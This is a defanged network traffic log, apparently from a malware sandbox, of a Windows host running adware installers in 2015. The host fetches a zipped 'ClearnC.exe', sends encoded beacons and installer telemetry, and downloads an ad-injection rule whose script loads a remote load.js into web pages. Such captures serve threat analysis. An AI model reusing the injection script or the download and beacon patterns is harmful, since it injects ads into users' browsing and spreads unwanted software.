Location: hXXps://VVV.google.com.ua/?gfe_rd=cr&ei=qLVCVZ3BLteDNJmBgQg&gws_rd=ssl
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=51f9c94f4cfe29d4:FF=0:TM=1430435240:LM=1430435240:S=g94WORl29EpjfH1w; expires=Sat, 29-Apr-2017 23:07:20 GMT; path=/; domain=.google.com.ua
Set-Cookie: NID=67=qdoOTsxHIBtzTljMGdrpSFmRCtEgqqpaqGd7TQCsWjdJn2cW0q0YIqjLKJ0KLzJVLGIWtQmLiygzoNGFC7PcavEgBZ0BXopqy-HiWAZ0-35cuvO-QET6X7KCnu_zeje-; expires=Fri, 30-Oct-2015 23:07:20 GMT; path=/; domain=.google.com.ua; HttpOnly
P3P: CP="This is not a P3P policy! See hXXp://VVV.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Date: Thu, 30 Apr 2015 23:07:20 GMT
Server: gws
Content-Length: 275
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Alternate-Protocol: 80:quic,p=1
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">.<TITLE>302 Moved</TITLE></HEAD><BODY>.<H1>302 Moved</H1>.The document has moved.<A HREF="hXXps://VVV.google.com.ua/?gfe_rd=cr&ei=qLVCVZ3BLteDNJmBgQg&gws_rd=ssl">here</A>...</BODY></HTML>
<<< skipped >>>
HEAD /ofr/isicicc2.7.cis HTTP/1.1
Accept: */*
Host: cdneu.beyabir.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:08 GMT
Content-Type: application/x-unknown-content-type
Content-Length: 385602
Connection: keep-alive
x-amz-id-2: mDcW82ox1HV Qa5CQlP7ax9z1LW NDusKLRqtoehnaXwvwv0/IvYJi gOiCMPvPQhpv51Gzogaw=
x-amz-request-id: 2863C8C2B1E22044
x-amz-version-id: YbU94Nse0oZofhTi2ZOIzFEKvuh9AniM
x-amz-meta-s3fox-modifiedtime: 1424088160999
x-amz-meta-s3fox-filesize: 385602
Last-Modified: Mon, 16 Feb 2015 12:09:44 GMT
ETag: "83fc375cf199ed35bd27a27f506b831f"
Accept-Ranges: bytes
HTTP/1.1 206 Partial Content..Server: nginx/1.6.2..Date: Thu, 30 Apr 2015 23:07:10 GMT..Content-Type: application/x-unknown-content-type..Content-Length: 180802..Connection: keep-alive..x-amz-id-2: mDcW82ox1HV Qa5CQlP7ax9z1LW NDusKLRqtoehnaXwvwv0/IvYJi gOiCMPvPQhpv51Gzogaw=..x-amz-request-id: 2863C8C2B1E22044..x-amz-version-id: YbU94Nse0oZofhTi2ZOIzFEKvuh9AniM..x-amz-meta-s3fox-modifiedtime: 1424088160999..x-amz-meta-s3fox-filesize: 385602..Last-Modified: Mon, 16 Feb 2015 12:09:44 GMT..ETag: "83fc375cf199ed35bd27a27f506b831f"..Content-Range: bytes 204800-385601/385602.. .(.....Y_...u9.o....)...d..Q.........n.....W.~..D...A..^........$ t../....<..$..H..Md^#......m....-.z{..B?$...K.n:hL......'..%....E..;..e..H.U........M..2.R}......H......#...U!.`.C..m._.........n.....E...^.......-54. ..I.Y...tRQ....o?.....H..@|h.......&... F..."........L....Q.gn.1....!..LS..............:.Q.)n...%..Cn2.d..N.....Z.;.L..]..gy..if,.D4=..=....;,].>....Ln...O..1......4.H...g/3.;P..Edh..'<l....2
<<< skipped >>>
GET /ofr/isicicc2.7.cis HTTP/1.1
Range: bytes=102400-204799
Accept: */*
Host: cdneu.beyabir.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Connection: Keep-Alive
<<< skipped >>>
GET /3517/2 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.ejpkwz.cc
Connection: Keep-Alive
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 01 May 2015 01:05:37 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.14p1
Location: hXXp://VVV.ejpkwz.cc/files/zip_r3/3517_89d09a830004d94b9f646d24de15e7f2/2.zip
0......
GET /files/zip_r3/3517_89d09a830004d94b9f646d24de15e7f2/2.zip HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.ejpkwz.cc
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 01 May 2015 01:05:38 GMT
Content-Type: application/zip
Content-Length: 3016484
Last-Modified: Tue, 28 Apr 2015 10:21:26 GMT
Connection: keep-alive
Accept-Ranges: bytes
PK........}*.F.4.k5...0.......479.db.0...!..........<..A#.U......L........* ...i.AU%......k.1...o4...MX*.8.D.].J.. ..f.q.oV.Q7..c..%!u..>..2.He.}.tod.Z..^B...ru-2(.........`h`.}...|g*..g...R.gcsw(.xa..x.v.C.]O $.".........3......4.........b...1Y8E. L........v.n..3.^B...ru-w.......c^.0......q|.".2.l..........iU.Z.....K.|..F.1...........Hov43E3fPK.........).F.U..............ClearnC.exe...`...8.?.#..6......HP4.....4.l.J`C`C.I@....1y..J ..j..U.j..W.\lK[o..U.Vt..$(..\.B...N.Tc.. .y.9..f....}.......=...9sf...33...-..A0.QUA8$......u..u..F......C......bC...z....6.....i.h{..V-m.m.d.Z.o.........T-....:.\....i....7.|....>........uP...........M..[;.'................!u.M..........~...n.....F.k.v. ..:..C....".....a#0......P...N..]...:.......e..m....}w.....".I......r..l......u.:H.!........|3n....g.O=....Bwe..m.5....:^g.........*7C...r..Y.._.n....._.[..x...C.P.....3cO.>S......w....s.{.K..r..pU.^.).sO.:.......PG*.9O..&A..*..\.V'Q....&...`9..H.[.'b4.bk./NY.......gW.x.!.y.r...4.t.Sr......V_Ab..X..S>..jN..I..h.. s<:.KM2B>J...4J...I.|v..B..=......$3.A9R..*....H......jR...=dP.c...H..H..n.m......~4dS..g.1t......N...!.o.r.O\.[..b...n5...5....~.E.. ...>.^".1S.HU:.~|.|.mTZ..s...L...x...k.#...._....?h.......i..7.>..t................R..=.......b]..z...W...h!.'.O.U.....Mk....=\...CN....~ .5)...~..Gg.0.x...........8>.!*....N.y..O..j%0.......Vh{.l..O..... `..RM..t.P..6....u.......;...r.0\j...`2F.CC..... ..E.......9......ao .GL......<br.j..Y....N.e..,?Jt;I.I..W~A.V._...Gl..q;&..M=.5....M./.<...)&...W.>..
<<< skipped >>>
GET //MEowSDBGMEQwQjAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CCQCRRRvT8MWO4g== HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.godaddy.com
HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:11:56 GMT
Server: Apache
Content-Transfer-Encoding: Binary
Cache-Control: max-age=120183, public, no-transform, must-revalidate
Last-Modified: Thu, 30 Apr 2015 22:20:25 GMT
Expires: Sat, 02 May 2015 10:20:25 GMT
ETag: "d08b003f15d07cc5bfc23c2479efc8bedd8da485"
Content-Length: 1788
Connection: close
Content-Type: application/ocsp-response
0..........0..... .....0......0...0...z0x1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy Inc.1 0)..U..."Go Daddy Validation Authority - G2..20150430222025Z0l0j0B0... ..........._lkv...8..f..R34N..@..'..4.0.3..l...,......E..........20150430222025Z....20150502102025Z0...*.H..............\.{...I...8P.q]..q6.a_.n#.......4.)Y.vn.3..tV..%ZYn..(.?.....@X\..).XeA/. ..v..7.~...R..c.F. ..........!...nI.=`...C..v......A...H..S.x..........4.AEw,..1.....!=..U&...t......Ii..A..p)....N0{..Z..L...M>t...m......^...y.....^*.E..2NG..p.>NH.H.....6.j....z.....0...0...0..........,.z.Hl..0...*.H........0..1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.1-0 ..U...$hXXp://certs.godaddy.com/repository/1301..U...*Go Daddy Secure Certificate Authority - G20...150316070000Z..160316070000Z0x1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy Inc.1 0)..U..."Go Daddy Validation Authority - G20.."0...*.H.............0.........xo(....QQ.`L.~...&...a.F.=.....d=....."......?...\..........b.D....l=.HS.N......A..;....C)...(..T........XA-N....k1 .....ag...,4.L{.I..hEKb..K......!.(...7....p.O...X.._........8.B..k[4...........e.../....^.S..7A.b.oB..\......2%.|c...A....Fk.T..24.0B...p..........0...0...U.......0.0...U...........0...U.%..0... ......... .......0...U.......O........f...e..r..0... .....0......0L..U...E0C0A.?.=.;hXXp://crl.godaddy.com/repository/mastergodaddy2issuing.crl0J..U. .C0A0?..`.H...m....000... ........"hXXp://crl.godaddy.com/repository/0...*.H...........
<<< skipped >>>
GET /services/stores?dummy=593 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.related.deals
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:22 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
P3P: CP="Potato"
X-Cache: MISS
X-Server: Provided by Intermedia
X-Country: UA
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Credentials: true
Content-Encoding: gzip
14b............mRAr. ...1.'.8.[..6.v_.%-....#....R..r[.Q'D.{..z.....Q...U..8..\...I.MN!.-.... .H@.Md.<z[...:cg\....Y.lh..l...{%../H.|..aT..l...;?-...k..UO.BMw)C.f..*..Q..bu.!.I.5...!.....y.HY.......... H.7..2.NX)g..$lxp....A..J/D..R..$...0...J.!R.K.D~.D.l.V..E.v4..-..P$.....R.BE...<.(*..;.....5..e.......8........9.g......O..4_].he......0......
GET /services/rules?dummy=865 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.related.deals
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:22 GMT
Content-Type: text/plain
Content-Length: 265
Connection: keep-alive
Last-Modified: Fri, 06 Feb 2015 21:11:55 GMT
ETag: "5d60ef-109-50e71dec37cc0"
Cache-Control: max-age=600
Expires: Thu, 30 Apr 2015 23:17:22 GMT
P3P: CP="Potato"
X-Cache: MISS
X-Server: Provided by Intermedia
X-Country: UA
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Credentials: true
Accept-Ranges: bytes
</body>|<script>var cb_instID='{instID}';cbS=document.createElement("script");cbS.setAttribute("type","text/javascript");cbS.setAttribute("src", "hXXp://related.deals/services/load.js");document.body.appendChild(cbS);</script></body>.{cashReminder_instID}|{instID}.....
GET /services/update/1.0.0/Oe7hZG4iL2THGzzgTyPL5m0uORXCQUea/677 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.related.deals
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:22 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
P3P: CP="Potato"
X-Cache: BYPASS
X-Server: Provided by Intermedia
X-Country: UA
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Credentials: true
GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.ds HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Apr 2015 23:07:20 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.62 ms","message":"store 1 action and 0 update "}..0..
GET /v4/sof-installer/535559167_198339_B48A115F?action=pcm.installer.istartsurf.finish HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926
Host: xa.xingcloud.com
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Apr 2015 23:07:25 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
4a..{"stats":"ok","time":"262.11 ms","message":"store 1 action and 0 update "}..0..
POST /YBRInternet/?v=5.0&c=1840466908 HTTP/1.1
Accept: */*
Host: os.beyabir.com
User-Agent: ICAS
Content-Length: 1404
Cache-Control: no-cache
0A0Czu0Y0B0RtN0U0I0DzutDtDyDtDyDyCtBtCtDtCyByEtCtCyD0FtN0W0VzuyCtFtCtN0W0S0PzutCtN0O0S0L1T1G1Nzu1P1GtN0E2V1P0C1M1J0S2Y1HzutAyDyEtCtDzytCyCyCtBtN1L1B0A1Q1H1L1GzutCtN0T0KzutAzzyEtAtAzytN0U0I0DzutDtDyDtDyDyCtBtCtDtCyByEtCtCyD0FtN0U0I0D0N1P2WzutDtDyDtDyDyCtBtCtDtCyByEtCtCyD0FtN0M0G0U0I0Dzu1RtDtAtBtB1T1R1QtGyD1PyD1QtGyEtB1OtDtG1StCyCtAtG1RyDzytC1P1PyC1O1OyD1SzytN0M0S0I0DzutBzzyDzztDtBtDzytAyDtGtBtCyDyCzyzytByDyDtDtGtAyCyDzztCtAtCzztDyEtN0S0I0D0U0I0Dzu0A0AyDzy0FtDyEyBzztDzytCtCzztByC0D0AtD0A0AzyyD0C0ByEzz0AtCtCyD0FtN0M0A0C1V0LzutDtDyDtDyDyCtBtCtDtCyByEtOtA0AtCzytBtFtCyCzztFtCtAzytFtCtAyDtOtA0AyCtOtA0AtCtN0S0D0TzutBtDtCyDtDyDtDtCtDtBtDyBtDzytDtBzztN0V0M0Czu0V0M0WtN1L1B0V0M0D1P1OzutCtN0P0E1V0M0O0D0Ezu0D0L0LtN1I1L2ZzutAyDyCyBzzzytN1L1Q1B1RzutByBtN0D0E0P1V0M0O0DzutBtN1L1B0A1Q1H1L1GzutCtN1L1B0U1T1R0O1GzutDtN1L1B0U1B1P1C0A1Q1H1L1GzutCtN0R0N1T1H1Pzu0CtOtA0AtOyD0C0U1B1P1C1BtOyD0C1T1Q1HtOyD0C0A1E1E0D1T2Z1TtOyD0C0L1F1R1T1ItOyD0C0T1P1H1EtOyD0C0T1P1H1EtOyD0C0O1NtA0C2X0TyBzz2X0S0M1TtD0NtD0L0P1T1LyB0Q2X2Z1NtA0C2X0TyBzz2X0S0M1TtD0NtD0L0P1T1LyB0Q2X2ZtOyD0CtAtCtDyBtCyE1V1L1BtF1P2V1PtN0O0S0L1T1G1Nzu1P1GtN0O0S0V1P1CzuyCtFtCtN0O0S0S0P0V1P1CzutCtN0O0S2VyCyEzutCtN0P0P0Nzu1TtCtDyC1RtAzz1PzyyCtCtBtByB1O1PyEtDtC1O1P1QtA1PtAyDyBtBzzyD1S1RtF1P2V1PtN0M1P1H0P1M0AzutCtAtByBtN0M1P1H0P1M0TzutBtDyEyBtN0M1P1H0V1L1C0AzutCzyyCyEtN0M1P1H0V1L1C0TzutBtDyEyBtN0P0R0O0D0U0C0T1V0T0I0T0L0Ezu1Q1P1B1E1C1F2Z1P2Z1F1C
HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/plain
Date: Thu, 30 Apr 2015 23:07:07 GMT
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: nginx
X-ICSCT-CC: UA
X-ICSCT-CITY: Kharkiv
X-ICSCT-GICSET: global1373
X-ICSCT-IP: 193.138.244.231
X-ICSCT-SERVER-NAME: ads.slave-128-eu-west-1b-c298b624
X-ICSCT-TIMESTAMP: 20150430180707062
X-ICSCT-VERSION: 1.2.8
X-ICSCT-XC: 1f3cfb072bc5ded412eb0f20eaa0b3fa349c056a
X-Robots-Tag: none
transfer-encoding: chunked
Connection: keep-alive
1f00..w!..h...h.jq1.....~.....Q..NH...!.......$&..L......D.....c3.=4.a.wlZ..=. .j:Hc.u.c....xJ<?j../x:..:;."..1......"U].7..IR......Lc..=..7c!..p4H..-..p..EI.Ff.6qpZ..Zj..G.....C?.Q>.g.7.U.7...5.....>I..f.oq.v.G......e6...9.?...)n6.T...%..Yu..w....!.5.%.-.35%.[.<0.9.q...ao..J.......I.a.?ca..`!...T.....fR0.7i..3.\..}.6.)....O@.T%.....w....\kCX.S.Wf...5..t.........<....%gf.U.....9..5zf.tn._1|.a..4U_GA..;.t{..c.x).LX)..}q".....EMr...q..cl.....L....1"..m..!cnr..h3....l.GG==K.R.iR.[*...&...vt.. ....~.....Q....9..Kn.(....s..y..(.BZ.x..~m..'p..`0..)....86..x.?.~...{{..9:..82.zN..E.3.......&..|=...a...9..x..RI...{08p.r._)...i%.q.._.p<.5x..Z[..gv....7R.@S..J..g...tV,.......;..uO.[...5.?..{*......._.W92...J.L.s.992.TmC......Y0.u.?...?..)Z....Stl....2..A. a|?wU.3..y....5..z..[I....)X#~p:.......g4.d6%...zd..g.8...q..&.....W..p....b ...Y...O............c,.s.N.\.9.u........=...$l..@h.T...@.r.[.3...n...h.;. ?.y9..|....4..y..r.........).g.......d.8r.E.O3@.{..8.. ...F..=..0e...{.f."....K:..5. ,.r.......o.}.F.N*....A..Su...l...i..a.{. ..#..J4...iT...r..............4hX...=.a=.....T.h.f.st;.G,.z..^v..k..h..O..x...n....8O...../o....b...G.QC...S!H]iL.. ..9n..|2.z.8....$..1../...2..R..N......O.45.w...t.?].q5..>7;.".....*Y.B.w...X..,...f..6%..[..>z`?x...*.)Esn....H....G...xzI#.J.A"...Ow...vr.."b....3../zd.h.........-......CO.U.`...IkM.uh...XC.%A.Tc:xY|t...Q....a.k.z..D....3h.....-.7.._U.N.bk9..>.3..l.f....A2.5."......`.!...t!..t......|.F...k......$J....}x...%I.U..V1...e...f.n..p.NOU.uB....X.Q.a-....H@.......
<<< skipped >>>
GET /windowspm/up?ptid=pcm&sid=WindowsMangerProtect&ln=en_us&ver=20.0.0.2227&uid=&upv= HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.theviilage.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 30 Apr 2015 23:08:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14p1
Content-Encoding: gzip
15............3............0..
POST /?pcrc=497235937&v=2.0 HTTP/1.1
Accept: */*
Host: rp.beyabir.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 688
Cache-Control: no-cache
....V.....2$.....R...\... Q.\......1Xu..o .F....TT........y. ..)..z.k..OIx.....9o1....J..!....A/....n2%.......|{")....Uq.w....hPT.d..U%...)DE.(.2..:SBy.W........A..k.S`.!.W..N.#.m.`g.\ST..u....... .8l....?...K._J....QnUU..J,.#........?......m.FY...z.-.a....@..(.9._2tZ...0p.......b...`........rQ*?.V.,...
|[@U5O..............(...? .Mf...M..7M.,,...$..4.U..D]y..Y..d b,....:N@.]..-.YR......f.{.[5.1.).............S.:..}=.Um.I.cYa.......`...-.,Ha/...X.tB............ .~.....Z<u.uG...s.../............6...H.L...`.r....%.S.....W~.c...FR[......IPx6:d..).C...C.O1...{.~B.6w..}b@JU....-..'.m../...?0....,.....!n......s.d.C2..U@Q...dL.2@.p...e..]p... ..X^.........K..6?...is_..|..WH.Tc...
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Apr 2015 23:07:08 GMT
Server: TornadoServer/4.0.2
Content-Length: 4
Connection: keep-alive
DONE
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTEemCaVgs8Tuh2B9fGVE0pKKNyzgQUTF+nNhcF4oZhIkk5jLmo40rgOBoCEC6utoKGY/7ZdVX4/iTzOxo= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com
HTTP/1.1 200 OK
Server: nginx/1.4.7
Content-Type: application/ocsp-response
Content-Length: 1552
content-transfer-encoding: binary
Cache-Control: max-age=521950, public, no-transform, must-revalidate
Last-Modified: Thu, 30 Apr 2015 00:10:33 GMT
Expires: Thu, 7 May 2015 00:10:33 GMT
Date: Thu, 30 Apr 2015 23:12:34 GMT
Connection: keep-alive
0..........0..... .....0......0...0........C...4N...@..6...v...20150430001033Z0s0q0I0... .........z`.V.<N.v...TM)(.r...L_.6....a"I9....J.8........c..uU..$.;.....20150430001033Z....20150507001033Z0...*.H.............e...E;....(..c.Fd...h@.e.....,.jPVAh..z...4..eL. ....2.G9.i}..H..!.}..........<.w..0W......a...S.K)AR.h..N...V}.5:,..xE......n..jn.:wg.h{....D.:-...~.7....L?..W...<.Vm..5.6o.g...3..=...f.R.W(.t.`.. &.4:..d....K..K..A./.e.d..W..K=a..l......f...........0.......50..10..-0..........y.P}~.EY....T]. 0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1<0:..U...3Class 3 Public Primary Certification Authority - G21:08..U...1(c) 1998 VeriSign, Inc. - For authorized use only1.0...U....VeriSign Trust Network0...141202000000Z..151216235959Z0..1.0...U....US1.0...U....Symantec Corporation1.0...U....Symantec Trust Network1?0=..U...6Symantec Class 3 PCA - G2 OCSP Responder Certificate 30.."0...*.H.............0..........6..]......w';.r........I..c..4.... .........TyW......hd_.....!C.k......SE<?o.H.. .me.c..9N.&....e.^-..a.....i\:..*."..u...|....".Nf3.~.L...QW...p.....-]UV8U...J&.<./.G.....I...4.T....#I*.i.E0\..~q$.I.......X?G....f.t......v.l.U.Ld.I...B.....=...Sf...H.s.........0..0...U....0.0l..U. .e0c0a..`.H...E....0R0&.. .........hXXp://VVV.symauth.com/cps0(.. .......0...hXXp://VVV.symauth.com/rpa0...U.%..0... .......0...U........0... .....0......0!..U....0...0.1.0...U....TGV-B-2740...*.H............1.`...i.....H.C.i.9~.i..Z.r.*$..(./.ag9.....J.Q.~.`.$?b..C....<.h.........d&....3.kV.....f.
<<< skipped >>>
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRODEXefhs/UZFum2o8YfzOFwceMwQUkz5j3yJ0BOBkhDHd2yOfDq+2TZMCEA89qsgV9niZmSI6gIO0S/U= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com
HTTP/1.1 200 OK
Server: nginx/1.4.7
Content-Type: application/ocsp-response
Content-Length: 1725
content-transfer-encoding: binary
Cache-Control: max-age=565181, public, no-transform, must-revalidate
Last-Modified: Thu, 30 Apr 2015 12:10:12 GMT
Expires: Thu, 7 May 2015 12:10:12 GMT
Date: Thu, 30 Apr 2015 23:12:34 GMT
Connection: keep-alive
0..........0..... .....0......0...0......%bn.$..5.......?'4....20150430121012Z0s0q0I0... ........N.E.~.?Q.n.j<a.....3...>c."t..d.1..#....M....=....x..":...K.....20150430121012Z....20150507121012Z0...*.H..............B.l..8........Gs/........"..........G...{?.^....R..'...)..........J...0.R.l..)........W.N........D...D.K.....C....y.<....Y.S....#93..B.}....6....%..3Sf... ...j..S=.,@....N.......[..%.yI_...1......)....N{.JOL....7..Ts..E.....qM@R.F.....J...M.R.C{.D~.j~...{....0...0...0..........7.R.~|..r."....#0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use at hXXps://VVV.verisign.com/rpa (c)091.0,..U...%VeriSign Class 3 Code Signing 2009 CA0...150401000000Z..150630235959Z0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1VeriSign Class 3 Code Signing 2009 OCSP Responder0.."0...*.H.............0..........z..|..>.....5.Z ...2.C MWIH.5......M.\.... ...eW..`.B=..`:..R. ...Z.k.Y.....p@.(3.c....a.;..[E....J:'...`...B....M..&......{. (........%......^[v[....m....*.T.o&4..3.....3.........G...e)...'?.K..2s..8=?..z.:..T..-.8R..8wv7*U.K..c...<s...]{.........6.?_...........0...0...U....0.0....U. ...0..0....`.H...E....0..0(.. .........hXXps://www.verisign.com/CPS0b.. .......0V0...VeriSign, Inc.0.....=VeriSign's CPS incorp. by reference liab. ltd. (c)97 VeriSign0...U.%..0... .......0...U........0... .....0......0"..U....0...0.1.0...U....TGV-B-34920...*.H.............,..-......q3a........z....t;B.z.h...]...#}.6.,..YU..
<<< skipped >>>
GET /SL2 HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/150814s/150814c.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: pcmega.go2cloud.org
Connection: Keep-Alive
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Thu, 30 Apr 2015 23:07:09 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: nginx/1.7.9
Content-Length: 43
Connection: keep-alive
GIF89a.............!.......,...........D..;..
GET //MEowSDBGMEQwQjAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CCQDstfTWy5byVg== HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.godaddy.com
HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:11:54 GMT
Server: Apache
Content-Transfer-Encoding: Binary
Cache-Control: max-age=120452, public, no-transform, must-revalidate
Last-Modified: Thu, 30 Apr 2015 22:25:06 GMT
Expires: Sat, 02 May 2015 10:25:06 GMT
ETag: "e6664fd0595206b2ff0e579607b274885636c2c5"
Content-Length: 1788
Connection: close
Content-Type: application/ocsp-response
0..........0..... .....0......0...0...z0x1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy Inc.1 0)..U..."Go Daddy Validation Authority - G2..20150430222506Z0l0j0B0... ..........._lkv...8..f..R34N..@..'..4.0.3..l...,............V....20150430222506Z....20150502102506Z0...*.H..............7y......\..b.H].W.]..}.$...R..&.1.0....<.Q.m......=......I..^..1...L.7..p.....E......#.UI....,P.4&.n....u!..ep..xZb.V.v.R\.FpN .%.......C.9......U.)X.#..=o.^.G.k..U..{.^.$1tE..\...[.5..75....]....b..w..j....N.0.V...-vh......e..........L..N_.[KS....%B.9".D....0...0...0..........,.z.Hl..0...*.H........0..1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.1-0 ..U...$hXXp://certs.godaddy.com/repository/1301..U...*Go Daddy Secure Certificate Authority - G20...150316070000Z..160316070000Z0x1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy Inc.1 0)..U..."Go Daddy Validation Authority - G20.."0...*.H.............0.........xo(....QQ.`L.~...&...a.F.=.....d=....."......?...\..........b.D....l=.HS.N......A..;
<<< skipped >>>
GET /s9.g?login=pcofferp&jv=y&j=y&srw=1716&srb=32&l=http://VVV.4threquest.me/registro/310113f8.htm HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/010914s/010914i.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: e0.extreme-dm.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.7.10
Date: Thu, 30 Apr 2015 23:07:06 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
Cache-Control: private,no-cache,no-store
Pragma: no-cache
Expires: Mon, 28 Sep 1970 06:00:00 GMT
GIF89a.............!.......,...........L..;..
GET /services/rules.txt?dummy=908 HTTP/1.1
